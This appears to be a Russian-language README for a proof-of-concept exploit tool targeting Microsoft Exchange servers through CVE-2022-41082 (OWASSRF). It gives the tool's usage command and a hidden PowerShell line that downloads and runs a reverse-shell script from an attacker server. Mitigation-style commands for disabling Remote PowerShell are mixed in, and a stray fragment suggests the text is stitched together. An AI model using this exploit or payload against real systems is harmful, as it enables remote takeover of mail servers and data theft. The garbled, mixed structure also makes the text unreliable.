
CVE-2022-41082-poc
Этот репозиторий содержит инструмент для демонстрации концепции (PoC) эксплуатации уязвимости OWASSRF (CVE-2022-41082) на серверах Microsoft Exchange. Эксплойт позволяет злоумышленникам выполнять произвольные команды на сервере, потенциально компрометируя систему.
Инструмент использует уязвимость OWASSRF для обхода аутентификации и получения удаленного выполнения кода (RCE) на сервере Exchange. Используя эту уязвимость, злоумышленник может выполнять команды так, как если бы он был аутентифицированным пользователем, что приводит к серьезным последствиям для безопасности.
При использовании этого инструмента пожалуйста, убедитесь, что вы держите открытым тот же сеанс командной оболочки Exchange Management Shell. Крайне важно включить удаленный доступ PowerShell хотя бы для одного пользователя после его отключения для остальных. В противном случае вы можете потерять доступ к Management Shell на всех серверах Exchange.
Вот несколько полезных команд PowerShell для проверки и управления доступом:
Чтобы узнать, какие пользователи имеют доступ Remote PowerShell, а какие нет, выполните:
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $false'
Предупреждение: Будьте осторожны и не закрывайте окно Exchange Management Shell, пока не добавите обратно хотя бы одного пользователя.
Вы можете отключить доступ PowerShell для всех пользователей с помощью следующих команд:
$user = Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
$user | foreach {Set-User -Identity $_ -RemotePowerShellEnabled $false}
Или используйте одну команду для достижения того же результата:
Get-User -ResultSize Unlimited | Set-User -RemotePowerShellEnabled $false
Чтобы предоставить доступ Remote PowerShell конкретному пользователю, выполните:
Set-User "guest" -RemotePowerShellEnabled $true
Если вы потеряли доступ PowerShell для всех пользователей, вы можете создать нового пользователя почтового ящика с правами администратора. Этот новый пользователь обойдет примененные политики, что позволит вам снова использовать Exchange Management Shell.
pip)Чтобы выполнить инструмент PoC, запустите следующую команду:
python3 poc.py -H <target_IP> -u <username> -p <password> -c <command_file>
Замените <target_IP>, <username>, <password> и <command_file> на ваши конкретные значения.
Вы можете изменить команду в вашем cmd_file, чтобы включить полезную нагрузку обратной оболочки. Например:
powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://your-malicious-server.com/reverse.ps1')"
Эта команда загрузит и выполнит скрипт PowerShell с вашего сервера, предоставив вам обратную оболочку.
Для получения дополнительной информации об уязвимости OWASSRF и коде PoC посетите следующую ссылку: OWASSRF CVE-2022-41082 PoC и https://www.youtube.com/watch?v=c2DZYP6jc7g